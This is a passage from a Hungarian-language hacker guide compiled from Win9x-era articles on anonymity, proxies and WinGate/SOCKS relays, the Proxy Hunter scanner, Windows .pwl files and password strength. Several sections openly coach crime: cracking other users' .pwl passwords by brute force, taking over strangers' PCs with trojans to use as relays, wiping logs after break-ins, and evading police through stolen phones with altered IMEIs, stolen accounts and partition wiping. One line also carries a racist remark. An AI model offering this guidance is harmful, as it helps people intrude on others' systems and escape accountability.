küldött levelet (ha a mailserver rosszul van beállítva) elküldi nekem... és így a<br />
headerben a suli infói lesznek :)<br />
166
Hackers’ Guide<br />
.chk fájlok, mi van velük?<br />
Szóval talán már biztos, hogy találkoztál .chk kiterjesztésű fájlokkal... Tudod, amiket<br />
a Windows gyárt nagyiparban a lefagyások után ;) Szóval ezekről beszélek... Hogy<br />
mi közül van ezeknek a névtelenséghez? Nézd csak meg a fájlok tartalmát... Úgye<br />
milyen meglepő, hogy mennyi információt tárolnak rólad??? Ajánlatos tehát minden<br />
alkalommal a C:\ gyökérből törölni az összes .chk fájlt!<br />
.pwl fálok?<br />
Igen... Ilyenek is vannak... és hogy a pwl kiterjesztés valójában mit takar? Az összes<br />
windows azonosítót/jelszót... Nézd csak meg... Ott van a C:\Windows könyvtárban...<br />
Érdemes megnézni közelebbről is őket... A fájl neve általában a felhasznalonev.pwl<br />
felállásban található meg... Nem kell ezekután semmit sem tenned, csak letölteni egy<br />
PWL fájl törő programot (pl. a Cain 1.51, de találsz más progikat is a<br />
http://ww.password-crackers.com URL alatt) és ráereszteni mondjuk Brute Force a<br />
kódtöröt... Milyen jó, amikor más dolgai között kutatgatunk :)<br />
Hogyan helyezzünk fel nem kívánatos dolgokat az internetre úgy, hogy<br />
identünk ne derüljön ki?<br />
Ehhez néhány perverz ötlet jutott az eszembe... Az egyik a cyberkávézók... Ugyebár<br />
itt a forgalom rettenetes és nem hiszem, hogy egy hét múlva emlékezni fognak az<br />
arcodra... és ugyanez mehet a könyvtárakban is... A Sulinetes termeknél vigyáznék...<br />
mert ilyenek miatt nagy csetepatét tudnak ám rendezni... A másik, hogy ahol hackelt<br />
oldalakat vagy illegális dolgokat fogsz feltölteni, oda ne járj vissza! Ez fontos! Miután<br />
feltöltötted a dolgokat fdiskel kedvesen töröld a partíciókat :) Ennél gyorsabb<br />
módszer nincsen a tisztogatásra... Aztán még egy ilyen bizarr ötlet az, hogy lopatunk<br />
a "színes kisebbséggel" frissen mobilt... megugye egy laptopot... összekötjük a kettőt<br />
aztán valami lopott accountal irány a net... :)<br />
Néhány link a végére...<br />
http://www.theargon.com<br />
http://www.pgpi.com<br />
http://www.cyberarmy.com<br />
http://2waymedia.hypermart.net/hh/browsers/index.htm<br />
http://www.anonymizer.com<br />
http://www.hacker.co.il<br />
http://www.hacker.co.za<br />
http://neworder.box.sk<br />
Összegzés meg miminden<br />
Szóval ha voltam olyan állat, hogy ennyit írjak, akkor úgy illik, hogy valamivel zárjam<br />
soraimat... Appendixnek a végére csak annyit, hogy hülyeség manapság egy olyan<br />
167
Hackers’ Guide<br />
helyen névtelenségről beszélni, ahol még azt is .logolják szinte, hogy mikor szarsz ;)<br />
... de egyvalamire jó ez az egész... Megmutatja számodra, hogy csak megfelelő<br />
odafigyeléssel tudsz felismerhetetlen maradni és a hackerkedés sem abból áll, hogy<br />
egy password fájlra ráereszted a John The Rippert vagy a L0pthCracket... Ennyi...<br />
Vége... Még utoljára elmondom... ha valakinek valami nem volt világos, akkor kérem<br />
írjon, mert múltkor is egy csomóan rinyáztak a mobilos cikk miatt... Csak azt nem<br />
tudom, hogy mit nem lehet rajta érteni?! Na mind1... Szóval ha próbléma van, akkor<br />
mélázzatok NEKEM!!!<br />
Nestan [FCF] mailto: nestan@freemail.hu<br />
·<br />
Külön köszönet a segítségért az alábbiaknak: RSC, Formater<br />
************************************************************************************************<br />
Hogyan maradjunk ismeretlenek?<br />
A hack-elés első és legfontosabb követelménye: NE BUKJ LE! Éppezért nagyon<br />
vigyázz és csak olyan dologba menj bele, amit TELJESEN biztonságosnak érzel!<br />
Ismerd a képpességeidet és mindíg csak annak megfelelően cselekedj! Mindennél<br />
jobban figyelj oda arra, hogy a ténykedésed ne legyen benne a log-ban/el legyen<br />
bujtatva az IP-címed. Ebben a kis tutorialban ezt a témát fejtem ki bővebben. Szóval<br />
kezdjük is azzal, hogy mi is az a socks/proxy/wingate/spoof-firewall. Ezek olyan<br />
server-ek, amik kapcsolódáskor a géped és a kapcsolódni kívánt gép közé<br />
ékelődnek és ezeken keresztül továbbítódnak az adatok úgy hogy a firewall kiszűri<br />
belőle a rosszindulatú csomagokat (a "házi" firewall program is képes erre<br />
softwaresen, de sokkal hatástalanabbul felügyeli az adatkommunikációt, bár a<br />
firewall servereken is ilyen fut komolyabb kivitelben), így azokra már nem kell<br />
ügyelned. A másik fontos tulajdonsága hogy a másik géphez kapcsolódva nem a te<br />
IP-d lesz látható hanem a firewall-é és ez a leglényegesebb, mert az Internet<br />
szolgáltatód egyből kiadja az adott időben használt IP-dből a telefonszámod/címed<br />
és már jönnek is a fakabátok (ezért kell valami telefonszám visszakereshetetlenítő<br />
cuccot(anti- tracert) használni. Bár ez már "kicsit" bonyolultabb dolog :), akik<br />
elkobozzák a géped és a csupa legális szoftvereid, a pornócédétől kezdve a hacker<br />
cuccos CD-n át egészen a felírt winfos2000-ig és még ezekért is jókora büntetést<br />
kapsz.<br />
168
Hackers’ Guide<br />
Legfontosabb különbség lehet firewall és firewall között hogy lehet anonymus vagy<br />
publikus. Ez annyit jelent, hogy a publikus nem használható hack-elésre, mert ha<br />
megmondják nekik hogy rajtuk keresztül törés történt, akkor secpec alatt megmonják<br />
az igazi IP-t. Az ilyen publikus firewall-okat általában cache-elés céljából hozzák<br />
létre. Az Internetes cache működése: amikor egy cache serverhez kapcsolódva<br />
akarsz adatot letölteni, a server először saját merevlemezén (vagy vele hálózatba<br />
kötött más cache serverek merevlemezén) próbálja megtalálni a kívánt adatot, ha ott<br />
megtalálja, akkor közvetlenül a cache-serverről nagyobb sebességgel letöltheted. Ha<br />
nincs meg, akkor letölti arról a helyről amit megadtál és elmenti a vinyójára, így<br />
legközelebb már benne lesz a cache-be (de egy idő után törlődik). Hátránya ebből<br />
következőleg hogy nem biztos hogy a legfrissebb infót kapod meg. A cacheserverekben<br />
akár a kért információk 30%-a is megtalálható.<br />
Az anonymus firewallok már megfelelő védelmet nyújtanak, de komolyabb tettek<br />
esetén azok sem védhetnek meg. Pl.: ha valami nagy dolgot hajtottál végre akkor<br />
onnan is megszerzik az IP-d. Ezért lehet komoly betöréseknél hasznos több firewall<br />
egymás mögé bújtatása, összefűzése. Ezt egyszerűen megteheted: miután<br />
csatlakoztál a firewall serverhez, újból csatlakozol egy másikhoz. Ennek többszöri<br />
végrehajtásával ellehetetlenítheted a visszakeresést. A legtöbb tűzfalat csak egy<br />
szűk kör hasznáhatja (Jelszóval szokták levédeni/vagy kitiltanak belőle IP-ket. Az<br />
olyanok amiket a nagyközönség is használhat általában tiszavirág életűek ezért a<br />
firewall listák naponta változnak.). Sajnos a hírhedtebb tűzfalak IP-jét sok server<br />
egyszer és mindenkorra kitilja magából elővigyázatosságból... Többféle firewall<br />
server létezik:<br />
1. Socks: IRC-s tűzfalnak szokták használni. Két típusa van: a socks4-es és a<br />
socks5-ös. Általában a 1080-as porton mennek. Hátrányuk lehet egyes ismeretek<br />
hiánya (OP :)) és (mint a legtöbb tűzfalnak) a lassúság. Természetesen csak arra jó<br />
hogy ne szívassanak IRC-ről. Ha nem tudsz jó socks-firewall-t akkor itt egy oldal,<br />
ahonnan egy kis klienset letöltve IRC-zhetsz anonymus: www.missingu.com<br />
2. Proxy: általában HTTP/FTP-hez szokták használni (ezek között vannak a<br />
cacheserverek). A 8080/3128-as portokon szoktak kapcsolódni.<br />
3. WinGate: ezt tulajdonképpen minden szolgáltatáshoz lehet használni<br />
(FTP/HTTP/TELNET/IRC/stb...). Default portjuk a telnet port (23), de egyre<br />
gyakoribbak a 1080-as porton üzemelők is.<br />
4. Spoof: a lényege hogy valaki más nevében (IP-címében) cselekszel. Ez már a<br />
haladóbb technikák közé tartozik. Abból áll, hogy pl egy trojan segítségével az<br />
uralmad alá kerítesz egy PC-t és azt használod firewallként, annak az IP-címét<br />
használod törésnél. Ez már kicsit brutális technika... :)) Spoof-olás után mindíg<br />
takarítsd el a nyomokat (trojan, stb.) Elvileg mindegyik firewall összefűzhető telnet<br />
segítségével. Ha bármi törvénybe ütközőt teszel a neten akkor jobb ha elbújtatod az<br />
IP-d. Ja, és SEHOL ne hagyj olyan nyomot amin keresztül eljuthatnak hozzád. Pl.:<br />
SOHA ne adj meg valódi nevet egy software-edben sem, ne regisztrálj sehol valós<br />
névvel, címmel, adattal. Mert baromi egyszerűen (akár egy JavaScript-el<br />
megtuthatnak mindent rólad... Itt egy jó cím kiindulásnak még az anonymizáláshoz:<br />
www.webprovider.com Ha már feltörted a célpontod, akkor már nem is nagyon van<br />
szükséged IP-bújtatásra (de ki tudja a kezdeteknél, hogy sikerrel jár-e?!... :)),<br />
169
Hackers’ Guide<br />
egyszerűen eltünteted a logfile- okból (figyelj hogy az összesből!) a bűvészkedéseid<br />
nyomát (de ezesetben később értesítsd a rencergazdit a bejutásod módjáról (ez így<br />
lojális), miután végrehajtottad a server-en azt amit terveztél) vagy szedd ki/írd át :))<br />
belőle az IP-t! Itt jegyezném meg hogy nagyon vigyázz a backdoor-okkal mer nem<br />
olyan nehéz őket megtalálni és sokan buktak már le backdoor használat közben!<br />
Vigyázz az e-mail-el mert manapság az is veszélyes (webes felületről<br />
levelezz+titkosíccs ha nagy dologra készülsz)! Egyébként a lakásodban ne tarts<br />
semmi olyat nagy akciók után ami perdöntő lehet (értem ezalatt a dokumentumokat<br />
és a programokat a vinyón és a lemezeken)! Itt egy útvonal, amin ábrázolva van,<br />
hogy hogyan juthatnak el hozzád (alatta pedig hogy hogyan szakíthatod meg a<br />
láncszemet) IP-d -> Internet hozzáférésed -> telefonszámod -> lakcímed Firewall/<br />
Lopott/hamis néven Használj valami Hack-elj $uliból Log-koz- regisztrált elérés<br />
anti-tracert/ (ez kész lebukás :) metikázás (vigyázz mert így átírt IMEI-jű<br />
Internet kávézóból is vissza tudják mobiltelefont! Ellenségedtől...<br />
nyomozni a számod!) * vagy mitomén :))) (*: de háromszögeléssel ezt is<br />
meg lehet találni de persze csak real time-ban és az esélye szinte 0) A legjobb ha<br />
mind az összes láncszemet kiiktatod ;) de persze erre (szinte) soha nincs szükség.<br />
De ha már a NASA-t töröd :) itt egy kis védelmi rencer: összefűzött anonymus<br />
wingate-ek egy spoof-olt netezőn keresztül vannak "bekötve", miközben lopott<br />
eléréssel egy átírt IMEI-jű mobilon anti-tracert használva ülsz egy mozgó kocsiban a<br />
laptop-oddal... Így talán nincs szükség a log-bűvészkedésre... :)))))) Nah, mára ennyi<br />
volna, de lehet hogy később folytatom... A dokumentumot csak az engedélyemmel<br />
publikálhatjátok máshol! ASCIImo<br />
************************************************************************************************<br />
Egyedi azonosító?<br />
Alig volt idô arra, hogy megjelenjenek a felháborodott újságírók cikkei az új Intel<br />
processzorokba égetett egyedi azonosítószámok kapcsán, máris felfedezésre került<br />
a Microsoft által programhibának keresztelt másik egyedi azonosító is, amely a<br />
Win98-as DOC fileokba épül be. Figyelnek minket a neten, tudják mikor és hol járunk<br />
- ha kellôképpen régi a konfigurációnk ahhoz, hogy a hatalmas Microsoft még ne<br />
tudja minden lépésünket követni, akkor is ott az IP címünk, amely alapján bármikor<br />
visszakereshetik tetteinket.<br />
Annak idején az iskolában úgy tanultuk, hogy az IP cím egy egyedi azonosító, mely<br />
alapján egyértelműen kideríthetô, hogy ki az adott felhasználó, s ez így is van, ám ha<br />
az ember kellôképpen megszelidíti, az IP-nek is könnyen nyoma veszhet a<br />
rengetegben.<br />
Böngészés közben akarva akaratlanul is kénytelenek vagyunk az adott weboldalnak<br />
IP címünket megadni - hiszen enélkül lehetetlen lenne a kommunikáció -, ám ha rá<br />
17 0
Hackers’ Guide<br />
tudunk bírni valakit, hogy álljon a közénk és a kiszolgáló közé, rejtve maradhat az<br />
adott oldal számára a mi címünk. Köztes félnek alkalmas pl. a<br />
http://www.anonymizer.com/ oldal.<br />
Anonymous E-MAIL serverek százával találhatóak a hálózaton - segítségükkel IP<br />
címet nem tartalmazó leveleket tudunk küldeni (s ha szerencsénk van, akkor az E-<br />
MAIL küldô server sem loggol), habár sok helyen megkötés van a napi<br />
levélforgalmunkat illetôen.<br />
Talán a legfontosabbnak IRC-zés közben tűnik az eredeti IP-nk elrejtése, hiszen a<br />
legtöbb negatív élményt itt szerezheti az ember, pl. ha belekerül egy netharc<br />
közepébe (vagy netán szembetalálkozik az ôrült netes gyilkossal, aki IRC-n gyűjti<br />
leendô áldozatait). A legegyszerübb módja az anonimitásnak, ha ellátogatunk a<br />
http://www.missingU.com címre, ahol egy JAVA-s IRC programmal csatlakozhatunk<br />
az IRCNetre, @missingU.com host-al. Ennél kellemesebb megoldás, ha egy<br />
nyilvános proxy-t használunk, hiszen így a megszokott IRC kliensünkel<br />
csatlakozhatunk a hálóhoz, csak a hostunk lesz a megszokottól eltérô. Szabadon<br />
elérhetô proxy serverek magyarországon is vannak - itt közölni ôket azonban<br />
értelmetlen lenne, hiszen a túlterhelés miatt lassúak lennének, és az IRC serverek<br />
sem engednék be a felhasználókat az azonos (proxy-s) hostok miatt.<br />
Nem csak mi tudunk elbújni mások mögé, ha óvatlanok vagyunk, mások is pajzsnak<br />
használhatnak minket, ha a 1080-as portunk nyitva van. Eképpen lehetséges akár az<br />
is, hogy egy személy 10-20 különbözô szolgáltatónál lévô dialup-os hostal legyen<br />
fenn egyszerre IRC-n, ami megkérdôjelezheti az IP cím egyedi azonosító mivoltát.<br />
A végsô kérdés igazán kézenfekvô: megtanulhatunk anonimitásba burkolózni mások<br />
mögé bújva, s üzenetközvetítôket használva - könnyedén. De mi van akkor, ha ôk<br />
éppen azért vállalják ezt a szerepet, hogy lehallgassanak minket?<br />
Video<br />
************************************************************************************************<br />
Proxy I.<br />
1. Mi az a proxy szerver?<br />
2. Milyen egy proxy szerver?<br />
3. Hogy talaljunk egyet?<br />
4. Hogyan konfigurajuk a bongeszobe?<br />
1. Mi az a proxy szerver?<br />
A proxy szerverek segitsegevel konnyen es gyorsan elrejthetjuk az IP-ket.<br />
17 1
Hackers’ Guide<br />
2. Milyen egy proxy szerver?<br />
A proxy szerver egy tuzfal szerver. Ehhez a szerverhez mas szamitogepek<br />
csatlakoznak es ezeken keresztul interneteznek. Ha bongeszel akkor ez altalaban<br />
igy nez ki:<br />
Te geped -> ISP (szolgaltato) -> A web lap (Igy a sajat IP-det latjak)<br />
Ha proxy-t hasznalsz:<br />
Te geped -> ISP -> Proxy -> A web lap (Igy pedig a proxy IP-jet latjak)<br />
A proxy elrejti a sajat IP-det.<br />
3. Hogyan talaljunk egyet?<br />
Kersz, kapsz :). Kulfoldi es hazai lapokon is szoktak lenni proxy listak, ezek nagy<br />
resze nem mukodik, de azert van kozottuk hasznalhato is. Altalaban a szolgaltatonak<br />
is van proxy szervere. Na de ha mar nincs mit tenni akkor olyan hostot vagy IP-t<br />
keresel amelyiknek szabad a 8080 vagy a 3128-ik portja.<br />
4. Hogyan konfigurajuk a bongeszobe?<br />
Internet Explorerben: View (nezet) -> Network (Internet beallitasok) Proxy tab.<br />
Ne hasznalj Netscape-et :) De ott is valahol a Properties-ben vagz Options-ban van.<br />
Zucco<br />
************************************************************************************************<br />
Proxy II.<br />
A proxy szót olyan értelemben fogom használni, mint átjárót két számítógép között.<br />
Tegyük fel, hogy van két számítógép, amelyek kommunikálnak egymással, A és B.<br />
Példánkban A kapcsolatot létesít B-vel, és adatot cserélnek:<br />
A ========== B<br />
Mindketten látják egymás IP címeit, és egyenesen oda küldik az adatokat. Ez a fajta<br />
kommunikáció a leggyakoribb az Interneten. Elképzelheto azonban olyan eset,<br />
amikor A nem tudja (vagy nem akarja) egyenesen B-nek küldeni az adatokat, hanem<br />
egy harmadik felet kér meg a közvetítésre, vagyis C-t:<br />
A ======= C ======= B<br />
17 2
Hackers’ Guide<br />
Ekkor A is és B is közvetlenül C-vel kommunikál, azonban C-nek mindössze annyi a<br />
szerepe, hogy az A-tól jövo adatokat továbbítsa B felé, mintha o küldte volna oket, és<br />
fordítva. Ebben az esetben C-t tekinthetjük proxynak. A proxy azért érdekes<br />
számunkra, mert ha A kezdeményezi a kapcsolatot B felé, akkor B nem fogja tudni A<br />
valódi IP címét, hanem úgy fogja érzékelni a csatlakozást, mintha C kezdeményezte<br />
volna (azonban a valóságban mögötte áll A).<br />
Többféle típusú proxy létezik (protokoll szerint megkülönböztetve). A telnetes<br />
kapcsolatok használatához (pl. email/fakemail küldése, IRC, accountra való<br />
bejelentkezés stb) gyakran használatos, egyszerusége miatt a WinGate. Ez<br />
általában a 23-as porton szokott lenni, és onnan lehet felismerni, hogy ha telnettel<br />
kapcsolódunk hozzá, akkor "WinGate>" prompttal köszön. Lássunk egy példát!<br />
Tegyük fel, hogy az ftp.rulez.org címre akarunk csatlakozni a 6667-es porton (ez<br />
általában az IRC portja), de nem akarjuk, hogy lássák az IP címünket. Közbeiktatunk<br />
egy WinGate proxyt, amelynek a címe például az, hogy proxy.wingate.com. Indítsuk<br />
el a telnetet, és csatlakozzunk a proxy.wingate.com -hoz (vagyis a wingate-hez)!<br />
>>MS Windows 9xRun, írjuk be: telnet proxy.wingate.com<br />
A megjeleno "WinGate>" szöveg után írjuk be: ftp.rulez.org 6667 (és üssünk entert):<br />
WinGate> ftp.rulez.org 6667<br />
Connecting... Connected to host ftp.rulez.org on port 6667<br />
és készen is vagyunk, megkezdhetjük a telnet-kapcsolatot, ugyanúgy, mintha nem<br />
használnánk proxyt.<br />
Fejlettebb szolgáltatást nyújt a SOCKS, kétféle verzió terjedt el széles körben, a 4-es<br />
és az 5-ös. Ezt nehézkes telnettel használni (a Win9x beépített telnetjével nem is<br />
lehet), de a legelterjedtebb IRC-kliensek (mIRC, Pirch98 stb) támogatják a<br />
használatát. A mIRC-ben (5.6-os verzió van meg nekem) nyomjunk Alt-O -t, és a<br />
Connect menüpont alatti Firewall menüpontot válasszuk ki. Jelöljük be az "Use<br />
SOCKS firewall" négyzetet, és válasszuk ki, hogy milyen verziójú szervert<br />
használunk. A "Hostname" mezobe írjuk a SOCKS proxy IP-címét vagy hostnevét,<br />
alá a loginnevet és a jelszót (ha kell), majd a portot (általában a SOCKS az 1080-as<br />
porton üzemel). "Initiate DCCs through firewall" - kapcsoljuk be, majd nyomjunk OK-t.<br />
Ezentúl minden alkalommal, amikor ircelni akarunk, a mIRC megpróbálja majd a<br />
csatlakozást a SOCKS-on keresztül létrehozni. Ha nem sikerül, hibaüzenetet kapunk<br />
(ekkor esetleg másik SOCKS-ra kell váltanunk).<br />
Pirch98-ban pedig az IRC menübol válasszuk a "Proxy setup" menüpontot, majd a<br />
megjeleno ablakba írjuk be a szükséges információkat (a Pirch csak a 4-es proxyt<br />
támogatja). Nyomjunk OK-t, és a továbbiakban csatlakozáskor a SOCKS-on<br />
keresztül kapcsolódunk.<br />
Proxyk kereséséhez Win9x alatt a Proxy Hunter nevezetu programot ajánlom, mert<br />
gyors, sokféle proxyt ismer, és sok szolgáltatása van. Errol a címrol lehet letölteni a<br />
legújabb verziót:http://member.netease.com/~windzh/indexe.htm<br />
17 3
Hackers’ Guide<br />
************************************************************************************************<br />
Proxy Hunter leírás<br />
Proxykat akarunk keresni, igaz? Ehhez definiálnunk kell a Proxy Hunternek<br />
feladatokat. A program ablakában három lap van (Tasks, Results, ProxySwitch).<br />
Kattintsunk a Tasks-ra (ha nem az aktív), majd az ablak alján az Add task gombra. Itt<br />
természetesen minden le van írva, mint ahogyan a programban mindenütt, csak hát<br />
ki olvassa végig ezeket, foleg, ha nem tud angolul, igaz?<br />
Állítsuk be a Task type-nél a Searching task -ot, és nyomjunk Next-et.<br />
Kattintsunk a Defined ranges -re. Elougrik egy ablak, ahol beállíthatjuk, hogy milyen<br />
IP-cím tartományokban keressen majd a program. Újakat adhatunk hozzá az Add<br />
gombbal, illetve a többi gomb is meglehetosen egyértelmu.<br />
Ha az Add -ra kattintunk, a legegyszerubb, ha fölül Start&End range -t állítunk,<br />
beírjuk az induló címet, a végcímet, az Annotationhoz valami megjegyzést írunk (pl.<br />
"Amerikai wingatek") és OK-t nyomunk. A muveletet többször is megismételhetjük.<br />
Ha végeztünk, jelöljük ki az egész listát, amit hozzáadtunk, és mentsük el egy fájlba<br />
a Save gombbal. Utána kattintsunk az Use-ra. Az elozo ablakba jutunk vissza, ahol<br />
láthatjuk hogy a kijelölt tartományokat a program felvette. Kattintsunk a Next -re.<br />
Itt fogjuk beállítani, hogy melyik portra fogunk keresni. A Defined -ben hasonló<br />
ablakot kapunk, mint az elozo. Itt is az Add gombbal tudunk hozzáadni portokat a<br />
feladathoz.<br />
Beállíthatunk port-tartományokat is, ekkor a tartományban levo összes portot végig<br />
fogja nézni minden számítógépnél, hogy nyitva van-e. Ha csak egy bizonyos portra<br />
akarunk keresni, akkor állítsuk be a Port range -t, és írjuk be a portot, ha pedig<br />
tartományra, akkor Single port -ot (tehát ez egy little bug a programban). Miután<br />
meghatároztuk a port számát, adjuk meg, hogy az adott porton milyen szolgáltatást<br />
keresünk (HTTP, SOCKS, FTP, Telnet(WinGate) és Unknown). Ha pl. FTP-t állítunk<br />
be, akkor a proxy hunter, miután talált egy nyitott portot, le fogja ellenorizni, hogy a<br />
talált porton ftp-szolgáltatás van-e. Ha Unknown -t állítunk be, akkor nem nézi meg,<br />
hogy mi van a nyitott porton, hanem automatikusan beírja találatnak.<br />
Kattintsunk az OK-ra. A muveletet csakúgy, mint az elobb, többször is meg lehet<br />
ismételni. Utána jelöljük ki a listát, és kattintsunk a Use -ra. A program fel fog tenni<br />
egy kérdést "Must try?", ami egy kis magyarázatra szorul.<br />
Az Use gomb hatására a kijelölt portokat hozzáadja a feladathoz. Ha az egész listát<br />
jelöljük ki, akkor az összeset. De tegyük fel, hogy a beállított IP-tartományban mi<br />
Wingate-ket és SOCKS-okat akarunk keresni. Ha beállítjuk egy adott portra a "Must<br />
try" opciót, akkor a Proxy Hunter minden számítógépnél meg fogja nézni, hogy nyitva<br />
van-e. Ha talál legalább egy "Must try" portot, csakis akkor nézi meg a nem "Must try"<br />
portokat. Ez azért kell, mert nagyon gyakori, hogy pl. a Wingate-k és a SOCKS-ok<br />
együtt fordulnak elo (tehát ugyanaz az IP Wingate és SOCKS is egyben). Ekkor elég,<br />
ha csak az egyikre állítunk be "Must try"-t, és ez nagyon felgyorsítja a keresést, hogy<br />
17 4
Hackers’ Guide<br />
a másikat nem kell mindenhol megnéznie (természetesen ezzel esetleg párat nem<br />
fog megtalálni).<br />
Nem maradt más dolgunk, mint hogy a "Finish"-re nyomjunk és ezzel felvettünk egy<br />
feladatot. Ezt el is menthetjük, a Tasks menübol az Export-tal.<br />
Több feladatot is felvehetünk, és a Proxy Hunter ezeken végig fog sorban menni.<br />
Ha befejeztük, kattintsunk az eszközsorban a kék háromszögre, úgy néz ki, mint egy<br />
Play gomb a videón. Váltsunk át a Results lapra, itt fogjuk látni a találatokat (ha lesz<br />
egyáltalán). Azok a találatok a nyerok, ahol GOOD! van a Status oszlopban<br />
(némelyik Verification timeout-os is jó lehet).<br />
Nagyjából ennyi. A programnak van még számos extra funkciója, de ennyi elég lehet<br />
a használatához.<br />
Itt van egy fájl, amit a Tasks>Import segítségével lehet beimportálni a programba. Ha<br />
végigfuttatjuk, végigkeres egy csomó magyar modemes IP-tartományt SOCKS után<br />
kutatva. A találatokat utána fel tudjuk használni például irceléshez. [Hungary.tsk, 708<br />
byte]<br />
Ez pedig egy másik file, ami csak egy IP-tartomány, ha netán mást portot szeretnénk<br />
keresni. Ehhez új feladatot kell definiálnunk, majd importáljuk a fájlt, utána pedig a<br />
fent leírt módon állítsuk be a kívánt portot. [HungaryDialup.ipr, 398 byte]<br />
Ja igen. A keresés közben használjunk jól bekonfigurált tuzfalat, mert sokan<br />
támadásnak hiszik, ha valaki csatlakozni akar valamelyik portjukra, és vissza fognak<br />
loni. Ez azt eredményezheti, hogy lekapcsol a modemünk, vagy megfagy a gépünk.<br />
************************************************************************************************<br />
A jelszavakról általában<br />
Password<br />
A jelszó amit a virtuális világban használunk, talán a reális világunk átjárója. A mai<br />
világban körül vagyunk véve jelszavakkal, még ha nem is egészen így hívjuk őket.<br />
Ott van a bankszámlánk, a mobiltelefonunk PIN kódja... stb. És vannak emberek akik<br />
ezt meg akarják szerezni, és ha nem vigyázunk, és óvatlanok vagyunk ez sikerül is<br />
nekik. Itt találsz majd egy pár információt, hogy hogyan is csínálják, és, hogy hogyan<br />
is védekezhetünk ellenük sikeresen.<br />
17 5
Hackers’ Guide<br />
Sokszor a védelmi rendszer hagy némi kívánnivalót magaután. Erre jó példa az<br />
eredeti windows 95-ben található jelszótárolási mechanizmus. (Ez a baki az OSR2ben<br />
javítva lett.) De ha a tárolási rendszer jó akkor csak egy féle módszerrel lehet a<br />
jelszót megtörni: az összes variációt kipróbálni. Ilyenkor fontos tudni, hogy mennyi a<br />
lehetséges összes előforduló jelszó és a keresési sebesség.<br />
A lenti táblázat a jelszókeresési időt ábrázolja a jelszó hosszának és a karakterek<br />
függvényében.<br />
A keresési sebesség 100.000 jelszó/sec. (Elég tisztes sebesség!)<br />
A jelszó<br />
hossza /<br />
Betűkészlet<br />
Azonos betű<br />
nagyság,<br />
csak betű.<br />
(26)<br />
Egyféle betű<br />
nagyság,<br />
betűk +<br />
számok. (36)<br />
Különböző<br />
betű nagyság.<br />
(52)<br />
Minden<br />
nyomtatható<br />
karakter. (96)<br />
4 0 0 1 perc 13 perc<br />
5 0 10 perc 1 óra 22 óra<br />
6 50 perc 6 óra 2.2 nap 3 hónap<br />
7 22 óra 9 nap 4 hónap 23 év<br />
8 24 nap 10.5 hónap 17 év 2287 év<br />
9 21 hónap 32.6 év 881 év 219,000 év<br />
10 45 év 1159 év 45,838 év 21 millió év<br />
A felhasználó választ egy jelszót, és a hacker megpróbálja azt feltörni. A felhasználó<br />
megpróbál olyan jelszót választani - és olykor sikerül is -, amit szerinte nehéz<br />
kitalálni, a hacker pedig az idővel van örök harcban. Mert ugye a táblázatból kitűnt,<br />
hogy egy sima 6 karakteres csak betü és állandó betűnagysággal írt jelszót (PL:<br />
jelszo) fel lehet törni ~1 óra alatt. De ha már 1(!) karakterrel többet írok hozzá és az<br />
az egy karakter szám, és esetleg van benne változó betűméret (PL: jELsZo7) akkor<br />
az idő megugrik ~2 napra. De ha egy 8 karakter hosszú jelszót kicsit megbolondítok<br />
(PL: I$am@Ok!) akkor ennek feltöréséhez 2287 év lesz. Ez egy örök harc<br />
volt/van/lesz. Persze itt most nem szólok a "gagyi" jelszavakról, mint például a<br />
felhasználói névvel megegyezők, vagy a kutya neve vagy ilyen marhaságok... És az<br />
intelligens feltörő módszerekről sem , ahol már a mesterséges intelligencia elemzi a<br />
felhasználó viselkedését, gondolkodásmódját, és abból próbálja összerakni, hogy<br />
mégis milyen szisztéma szerint választotta ki az adott felhasználó a jelszót. Pedig a<br />
jövő ezé lesz!)<br />
Milyen jelszavakat is szeretnek a hackerek? Azon kívűl, hogy a megfejtetteket... =D<br />
Bizony ha az emberek maguknak generálnak jelszót akkor sokan beleesnek a<br />
"kutyámneve" csapdába. Gyakran az emberek olyan jelszót találhak ki amire egy kis<br />
háttérnyomozás után rá lehet jönni. Például, foglalkozás, az említett<br />
kutyám/macskám/lovam/barátnőm/barátom neve, utca neve ahol lakik, személyi<br />
szám vagy más igazolvány szám, neki vagy családtagja születési éve kombinálva,<br />
stb... Vagy ha nem is ilyen egyszerűket akkor közismert jelszavakat. Ezeket a<br />
gyakrabban használt jelszavakat a hackerek tudják és ezekkel próbálkoznak először.<br />
Ha esetleg érdekel egy ilyen szólista itt: ftp://ftp.cso.uiuc.edu/pub/security/wordlists/<br />
elvileg találhatsz egy csomót.<br />
Ha, beszélsz idegen nyelveket (elég egy kicsit) akkor ezeket a szavakat<br />
használhatod jelszóként. A hackerek legtöbbször angol nyelvű szótár-fájlokat<br />
17 6
Hackers’ Guide<br />
használnak, mivel az internet nyelve az angol. Ha mondjuk a jelszóban szerepel<br />
például egy német, vagy indiai, szó az külön poén, hátha még számokkal<br />
helyettesítesz néhány karaktert... sőt ha visszafelé írod... =)<br />
A talán legjobb megoldás a számítógép generálta véletlenszerű jelszó. Sajnos ez<br />
sokszor nem megfelelő mert így eléggé megjegyezhetetlen jelszavak jönnek ki (PL:<br />
zmg74u5p) De ha nem megjegyezhető akkor bizony előbb utóbb le lesz írva. Vagy a<br />
jegyzetfüzetbe, vagy a számítógépen egy file-ba. Ezek pedig a legrosszabb<br />
megoldások. A jegyzetfüzetet el lehet hagyni, a számítógépet pedig fel lehet törni.<br />
(Persze ha mondjuk egy txt file-ban pgp-vel lekódoljuk,és betömörítjuk jelszavazva<br />
rarral akkor az kicsit biztonságosabb. Azért ne zippel mert az sec perc alatt<br />
feltörhető!!!) Egyszer majd csak születnek olyan programok amik majd humánus de<br />
nehezen megfejthető jelszavakat generálnak... =)<br />
Ha már saját magunk akarunk könnyen megjegyezhető jeszót készíteni akkor<br />
érdemes két értelmes szó közé beszúrni egy karaktert mondjuk a $ jelet. Ez<br />
megnehezíti a hacker dolgát mert ő nem tudja, hogy az alma$körte jelszóban van 2<br />
értelmes szó csak valamilyen karakterrel van elválasztva, és úgy unblock nézi az<br />
egészet. Meg lehet nézni hogy egyébként is egy 10 karakteres jelszónál azonos<br />
betűmagassággal is több év (~40) a megfejtési idő.<br />
Írok egy kicsit a (case sensitive) változó betűnagyságú jelszavakról is... =) Ez röviden<br />
azt takarja, hogy a jelszót nem csupa kis, vagy NAGY betűvel írjuk hanem<br />
öSszEViSsZa. a neten ez a legkedveltebb módszer a jelszavak kitalálása<br />
szempontm jából. Két ok miatt is. 1. Egyszerű őket megjegyezni. Ha egy értelmes<br />
szót megbolondítunk egy ilyen kisbetű/NAGYBETŰ trükközéssel, sokkal nehezebb<br />
